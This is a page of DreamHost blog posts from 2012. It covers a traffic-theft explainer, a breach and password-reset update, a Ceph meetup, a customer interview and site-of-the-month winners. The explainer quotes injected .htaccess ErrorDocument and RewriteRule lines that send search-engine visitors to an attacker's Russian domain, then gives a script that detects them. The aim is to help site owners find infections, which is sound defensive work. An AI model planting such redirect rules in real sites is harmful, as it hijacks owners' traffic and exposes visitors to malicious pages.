The Official DreamHost Blog! Tales From the Inside!

What is Traffic Theft?


There have been some recent allegations stating that a handful of compromised websites on our network involved with domain traffic “hijacking” were somehow connected to the illegal intrusion in January that caused us to initiate a complete password reset of all FTP and SSH users.

An extensive investigation has revealed that no customer FTP or SSH user accounts have been maliciously accessed due to this password breach. The websites reported as involved with this traffic hijacking have been reviewed and the site owners notified of the issue on their sites.

Domain hijacking has been around as long as web apps have existed, and until bug-free software exists, it will continue to trouble website owners for some time to come. We wanted to explain exactly what is meant by “hijacking” to help clear up some confusion.

Have you ever wondered, “Why would anyone try to hack my website?” Many answer this by presuming they’re too small of a target to become a victim of a high-tech crime syndicate, but truth be told these criminals want your sites and they want them badly. Why? Well it all comes down to money. The more hosts they have compromised, the more money they can make.

Cyber criminals’ main intent is to hit a site and go unnoticed…until it’s time to cash out. Attackers don’t care how big or small you are, and it is more likely that a site that is run by a small business or single site owner is going to not only be behind on their security updates for any software running on their site, but it’s also unlikely that they regularly monitor their site for malicious activity.

The “cash out” phase is usually when our customers first find out that they’ve been compromised. By that time their site(s) are now taking part in one or more unscrupulous online activities. We will be doing a short series of posts that cover methods these attackers use as well as what you should be on the lookout for.

Today we will be going into just one of these attackers’ malicious actions, so you know a little more about what to look for.

Traffic theft: via infected .htaccess files.

If you notice your site’s traffic unexpectedly dropping, or perhaps you’ve been flagged by Google as having “malicious” content, then there’s a good chance your site has been compromised.

What the attackers may have done is set up a new “.htaccess” file on your site or infected your existing one. .htaccess files are read by your web server to govern the way your site behaves. .htaccess files can be created with rules that will steal your legitimate traffic and send the visitor to an attacker’s malicious URL. This attack originated by simply infecting a site’s pages via iframe tags, but it has since evolved to utilize .htaccess “RewriteRule” and “ErrorDocument” directives.

Here is a simple example:

ErrorDocument 403 hxxp://congatarcxisi.ru/mays/index.php
ErrorDocument 404 hxxp://congatarcxisi.ru/mays/index.php

And here is a more complicated one:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|…
RewriteRule ^(.*)$ hxxp://congatarcxisi.ru/mays/index.php [R=301,L]

(to explain the above, the attackers are basically taking any search engine traffic, and redirecting it to their site)

You can check for these types of infections on your own! Just review your site’s .htaccess files (you may need to enable viewing of hidden files in your FTP/sFTP client so you can view “.htaccess”.) We are already actively scanning for these infections on our customers’ sites, so if you see an email from our Security team please make sure you review the report and take the recommended actions.
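One way to automate the .htaccess review described above, as an added example (not DreamHost's own scanner): it flags ErrorDocument and RewriteRule targets that point to another host, and notes when a redirect is gated on a search-engine Referer. The function name, the `own_hosts` parameter and the sample hosts are assumptions made for illustration.

```python
import re

# Absolute-URL target. "hxxp" is the defanged form used in write-ups; a live
# infection would use http/https, so both are matched.
EXTERNAL_URL = re.compile(r"^(?:https?|hxxps?)://([^/\s:]+)", re.I)
SEARCH_REFERER = re.compile(r"google|yahoo|bing|baidu|ask", re.I)


def scan_htaccess(text, own_hosts=()):
    """Return (line_no, reason) findings for the contents of one .htaccess."""
    own = {h.lower() for h in own_hosts}
    findings = []
    referer_cond = None  # line of a pending search-engine Referer condition

    def off_site(target):
        m = EXTERNAL_URL.match(target.strip('"'))
        return bool(m) and m.group(1).lower() not in own

    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if len(parts) < 3 or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "errordocument" and off_site(parts[2]):
            findings.append((no, "ErrorDocument sends visitors off-site"))
        elif directive == "rewritecond":
            if "http_referer" in parts[1].lower() and SEARCH_REFERER.search(parts[2]):
                referer_cond = no
        elif directive == "rewriterule":
            if off_site(parts[2]):
                reason = "RewriteRule redirects off-site"
                if referer_cond is not None:
                    reason += f", only for search-engine referers (line {referer_cond})"
                findings.append((no, reason))
            referer_cond = None  # conditions apply only to the next RewriteRule
    return findings


# Constructed sample for illustration; hosts are placeholders.
SAMPLE = """\
# legitimate rules
ErrorDocument 404 /errors/404.html
RewriteEngine On
RewriteRule ^(.*)$ https://www.mysite.example/$1 [R=301,L]
# injected rules
ErrorDocument 403 hxxp://redirect.example/landing.php
RewriteCond %{HTTP_REFERER} (google|yahoo|baidu) [NC]
RewriteRule ^(.*)$ hxxp://redirect.example/landing.php [R=301,L]
"""

if __name__ == "__main__":
    for line_no, reason in scan_htaccess(SAMPLE, own_hosts=["www.mysite.example"]):
        print(f"line {line_no}: {reason}")
```

Pass your own hostnames in `own_hosts` so canonical-host redirects are not reported; anything still flagged deserves a manual look, since a referer-gated redirect is invisible when you visit the site directly.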

Based on the sites we have cleaned up already, these attacks have almost universally been due to insecure website software running on the site in question. You could have the best passwords in the world, but if the apps you’ve installed on your server have any security vulnerabilities or aren’t kept up to date, attackers can still find their way in.

We are open to sharing information about web based attacks because we strongly believe in cooperation, collaboration, and responsible disclosure regarding Internet security. If you are interested in providing details related to these attacks or have questions for us, please contact our abuse team with information about any projects you may be working on that may be related to these infections and we will be glad to discuss this matter with you further.

In a follow up post I will cover the life of a web based attack when a new vulnerability is released (from 0day to 1000day), so stay tuned!

Filed Under: Insider View, Updates

A League of Extraordinary Gentlemen Discusses OpenStack & Ceph


OpenStack Meetup about Ceph

The “Ceph Lords” refer to an elite society of scholars, technologists, and engineers that was founded by Captain Nemo almost 150 years ago.  While on a seafaring exploration 20,000 leagues under the sea, he tangled with a colossal cephalopod that had never been documented before.  Thereafter, the Captain recruited the best and brightest to study nature’s mysteries and apply their discoveries in an effort to advance science and technology.

Over fifty highly esteemed members of the OpenStack community will convene at DreamHost’s San Francisco office on Thursday, February 2nd.  The theme of this Meetup will be the Ceph storage project and how it’s currently being implemented in production.

Ceph is a massively scalable, open source, distributed storage system.  There has been widespread interest from the OpenStack community in using Ceph’s RADOS Block Device to fill the block storage void in the cloud software stack.  There is also interest in using Ceph’s object store as a potential alternative to Swift.

The OpenStack project has been an important part of Ceph’s development effort.  To learn more about how the Ceph team is contributing to the OpenStack project, visit http://ceph.newdream.net/openstack/ .

RSVP today to save your spot at this upcoming OpenStack Meetup.

 

Agenda

6:30 PM – Food, drink, & networking

7:15 – Welcome

7:25 – “Introduction to Ceph and DreamHost’s Object Service Deployment”

Ben Cherian, GM of Emerging Tech at DreamHost, will kick off the discussion.  He’ll provide a general overview of the Ceph project.

Tommi Virtanen, Senior File Systems Engineer, will continue the overview from a much more technical perspective.

Carl Perry, Cloud Architect, will finish with a real-world description of the DreamHost object storage service implementation of Ceph.

8:15 – Intermission

8:30 – “OpenStack Block Storage with Ceph”, Christopher MacGown, Co-Founder and CTO of Piston Cloud Computing, Inc.

9:15 – Sessions are complete – more networking

 

 

Filed Under: Ceph, Events, OpenStack

Customer Spotlight: Splatter Music



Congratulations on Splattermusic.com winning DreamHost Site of the Month in the content, design and overall categories! Tell me about Splatter Music?

Jim: Thanks! I launched splatterMUSIC.com in February 2011 as a video site that focused on more serious, user-generated content such as new music videos and album reviews. I quickly realized the comedic content of the site was getting the most attention and it’s what I really enjoyed the most too. In July, I shifted splatterMUSIC to focus completely on the comedic video and music content, and the rest is history. Our slogan is — “All Music. All Video. All Funny.” — because we are the only comedic music site and feature only hilarious, quality, video content.

And aside from being a website with a lot of crazy FAIL, music video parodies and barfing drummer videos, we’re increasingly known as a powerful place for bands to get unique exposure. When there is a stage mishap caught on video, for example, you have a cool way for you to reach new fans and that’s where we come in. Just this week actually, we launched a short clip from a local LA band called “Raw Geronimo” to be funny, while also giving them some cool publicity and new fans.

Who designed your site?

Jim: I did. I am not very technical, but I had built some previous websites with WordPress and can usually figure out how to do what is needed. A huge amount of time went, and still goes, into the site’s design. It’s meant to be simple, clean, LOUD and fun.

What is your web traffic like?

Jim: Well, our busiest day last month had over 282,000 video views. I’m working hard to make every day that awesome. An average day isn’t too far below that though. Most of all, we have a really active audience that hang out and watch a few videos at a time, which is awesome. I even created a fake user name that I use when I comment and talk to people on the site.

Which Splatter Music landing page has the most traffic?

Jim: Our viewers usually come to the site from a link to a particular video that was shared with them. So the most popular videos are the most popular pages. A lot of people then stick around and cruise the homepage for more videos, which makes me super happy.

What are your favorite videos?

Jim: All of them are really my favorites since I approve the final content of the site. I am the Hugh Hefner of splatterMUSIC. I think two of my favorites today are “Top 5 Worst Guitar Solos Ever” and “Orchestra Fail.” Those rip me every time.

What videos got the most action on your site?

Jim: The most popular video ever is “Notorious B.I.G. Calms Crying Baby.” When we posted that video ahead of the curve, the discovery engines and social networks got hold of it and it exploded.

How long have you been using DreamHost?

Jim: When I decided to create the site, I went with DreamHost. I also use DreamHost for my late father’s website, which holds many of his books, lectures and writings. That site is RonMillersWorld.org. He was a highly-regarded expert, so anyone with an intellect in theology and spirituality should check it out.

How did you find DreamHost?

Jim: I used Google search and carefully researched the companies that were recommended for web hosting. I called each of them and the person I spoke to at DreamHost was really down to earth and helpful. I didn’t feel like he was trying to sell me. It’s been a perfect marriage ever since.

Any parts of the DreamHost Panel you use?

Jim: Yeah, I use the DreamHost Panel all the time: 1-click Installs, site status, support questions, renewals and registrations, WebFTP, etc. There might even be some new additions coming to the “splatter” family later this year.

What’s next for splatterMUSIC?

Jim: Right now we are testing original splatterMUSIC videos, and also teaming up with celebrity musicians to shift into becoming a production entity as well as a distribution channel. One example is a video by Mat Devine of Kill Hannah called “MAT DEVINE READS: “Damn It Feels Good To Be a Gangster.” We’re high school friends from back in Chicago and it is hilarious. So the short-term will increasingly see a lot more of these partnerships, as well as a lot of crazy original splatterMUSIC productions.

Where else can we find you online?

Jim: We are all over that information highway, but Facebook and Twitter are our primary social networking hubs.

Facebook: http://www.facebook.com/splatterMUSIC

Twitter: http://www.twitter.com/splatterMUSICco

 

Filed Under: Customer Profile

Security Update


In the DreamHost spirit of transparency and openness, I’m providing this update on our blog on the security issue yesterday. It’s necessarily pretty dry and factual, unlike most DreamHost posts, but it’s important to communicate as much detail as possible while not disclosing the inner workings of our security defenses. The bad news is that we detected access to one of our databases and took rapid action to protect customer accounts and passwords. The good news is that it does not appear that any significant malicious activity has occurred on any customer accounts as a result of the illegal access.

Early yesterday, one of DreamHost’s database servers was illegally accessed using an exploit that was not previously known or prevented by our layered security systems in place. Our intrusion detection systems alerted our Security team to the potential hack, and we rapidly identified the means of illegal access and blocked it.

Our first priority in this situation is to protect the safety and security of our customers’ websites and information. A quick review of the data potentially accessed indicated that some customers’ FTP and shell access passwords may have been compromised. So we decided to err on the side of caution and immediately initiate a forced reset of all customers’ FTP and shell access passwords, with the aim of preventing any illegal activity on customer websites. All FTP and shell access passwords were reset, and customer notifications were inserted in the web panel and on www.dreamhoststatus.com asking customers to specify new passwords once they’d logged in.

DreamHost has three types of user passwords – a web panel password, FTP/shell access passwords, and email passwords. Web panel passwords and email passwords were not accessed or affected. However we recommended in an update email to customers and their email users late yesterday that they reset their email passwords as well, as a precaution. It’s important to note that NO CUSTOMER BILLING INFORMATION OR OTHER PERSONAL INFORMATION WAS ACCESSED.

Our Security and Software teams have been investigating if any customer sites, apps or blogs have been affected as a result of the intrusion. As yet we have not identified any major issues – potentially as a result of the swift action to force a password reset. We’ll continue to monitor all systems and investigate and assist with any issues if they come up. We’ll all be working hard over the coming days to minimize any impact on customers beyond the password reset.

DreamHost uses a sophisticated suite of security software and constant monitoring that typically prevents any type of illegal access to our systems. In this case, our systems were not able to prevent the unauthorized access, however our intrusion detection system did allow us to respond immediately and minimize customer impact. We’ve already implemented changes to prevent any similar attempted hacks, and we’re performing a rigorous security review including a detailed review of customer input on potential vulnerabilities. Defending against cyber attacks is unfortunately an everyday part of business for Internet companies, so we’re constantly evolving our security measures to prevent them.

Thanks to all our customers for your patience, support and understanding. We acted swiftly to minimize the risks of the intrusion, and we know that changing passwords has caused you inconvenience. Customers who have ongoing concerns can contact our support team through the web panel. And I’ll be posting another update here if there is further information that can be shared publicly.

Simon Anderson
CEO, DreamHost

Filed Under: Updates

DreamHost and Ceph to Sponsor SCALE 10x


SCALE 10X

Shhhh! Do you hear that?

Listen!

Close your eyes and really concentrate.

That, my friend, is the sound of about two thousand oversized nerd guts clenching in feverish anticipation of the Southern California Linux Expo!

We can count ourselves among the clenched faithful as both DreamHost and the Ceph team are sponsors of the show this year!

SCALE 10x (it’s the 10th one!) kicks off TOMORROW at the LAX Hilton!

Ceph’s chief architect, Sage Weil, will be speaking at SCALE Sunday, January 22nd, at 4:30pm in the “Los Angeles B” room: “Ceph Distributed Storage System”

If you plan to attend SCALE this year make sure you stop by the Ceph booth (booth #6!) to meet some of our team!

Bring a resume too, because you never know what might happen… Both DreamHost and Ceph have plenty of jobs and not enough people!

Try to get some rest tonight.

Unclench yourself and prepare to be assaulted by an open source love-fest.

Things will get weird.

Filed Under: Business, Events

Countdown to the New Year with the November 2011 DreamHost Sites of the Month!


Every month DreamHost customers have had the opportunity to submit their site for voting on their account control panel, and other DreamHosters can then vote on them for a chance to be named a DHSOTM (DreamHost Site of the Month)!

DreamHost Sites of the Month –  November

The winner in the Overall, DESIGN, STRUCTURE and ORIGINALITY categories is: Portfolio of Daniel Hritzkiv

“Daniel Hritzkiv is a web-centric graphic designer always looking to create great new things.”

The winner in the CONTENT category is: My After Sex Buddy

The After Sex Buddy is the world’s first after sex cuddling doll.

 

Stay tuned for December 2011 DreamHost Sites of the month!

Filed Under: Customer Profile

Countdown to the New Year with the October 2011 DreamHost Sites of the Month!


Every month DreamHost customers have had the opportunity to submit their site for voting on their account control panel, and other DreamHosters can then vote on them for a chance to be named a DHSOTM (DreamHost Site of the Month)!

DreamHost Sites of the Month –  October

The winner in the DESIGN and STRUCTURE categories is: The Modern Nomad

“A blog tracking my transformation from office worker to world-wandering nomad. I focus on text quality and design. The content is a mix between personal experiences and information useful to anyone interested in a nomadic lifestyle. The theme was re-written from scratch.”

The winner in the CONTENT, ORIGINALITY, and OVERALL categories is: splatterMUSIC
“There are enough sources that feature, cover, regurgitate and promote the very best of music. And so I’m here to promote the very WORST! splatterMUSIC is the first and only comedic music site and features only video content. I hope you enjoy… or at least laugh.”

This month we’d also like to recognize an incredible piece of Facebook appery from one of our customers. It went viral in the weeks leading up to Halloween and doesn’t show any signs of stopping. I won’t ruin the surprise for you, but be sure to check it out at…

http://www.takethislollipop.com/

Filed Under: Customer Profile

Doin’ the shuffle


In the hosting industry customers do switch hosts from time to time.

It happens.

"It happens"

Customers leave DreamHost and old customers come back to DreamHost. Every day.

It happens to us, and it happens to other hosts.

It’s an endless cycle of creation, destruction, and rebirth.

It's the endless cycle of which we are all a part...

It keeps things interesting and it keeps us on our toes.

There are many reasons for customer churn. Pricing, features, service levels, and positions on hot political issues are just some of the many criteria that a discriminating hosting customer might look for when selecting a home for their website.

“SOPA” has been in the news a lot lately. It’s a piece of legislation that threatens the very nature of the Internet. DreamHost opposes SOPA. Many web hosts do. But not all.

The Save Hosting Coalition explains why SOPA is bad for web hosts. And americancensorship.org explains what’s wrong with SOPA in a great infographic.

If your host has rubbed you the wrong way about SOPA or any other issue, allow us to lather you up with this special offer…

SOPAROPA!

It’s a great way to get yourself up and out of a bad hosting situation, and into the loving arms of DreamHost – lovers of open-source software, WordPress, free speech, freedom on the Internet, puppies, kittens, and candy.

Filed Under: Business, Funnyish, Musings, Promotions, Updates

Countdown to the New Year with the September 2011 DreamHost Sites of the Month!


Every month DreamHost customers have had the opportunity to submit their site for voting on their account control panel, and other DreamHosters can then vote on them for a chance to be named a DHSOTM (DreamHost Site of the Month)!

DreamHost Sites of the Month –  September

The winner in the DESIGN and ORIGINALITY categories is: Max Parr

“Max Parr is a Filmmaker and Photographer. These are his selected works.”

The winner in the STRUCTURE, CONTENT, and OVERALL categories is:  Boulomma
“Branding, Logos, Brochures, Websites, and Mobile applications”

 

 

Filed Under: Customer Profile

Countdown to the New Year with the August 2011 DreamHost Sites of the Month!


Every month DreamHost customers have had the opportunity to submit their site for voting on their account control panel, and other DreamHosters can then vote on them for a chance to be named a DHSOTM (DreamHost Site of the Month)!

DreamHost Sites of the Month –  August

The winner in the DESIGN and STRUCTURE categories is:  One Long House

“We are a cooperative of designers, writers, photographers, programmers, and creatives alike. Our common bond is embracing curiosity and loving to create.”

The winner in the OVERALL, CONTENT, and ORIGINALITY categories is:  Tampa Changing Re-Photography
“Re-photographing historic buildings in Tampa, Florida.”

 

 

Filed Under: Customer Profile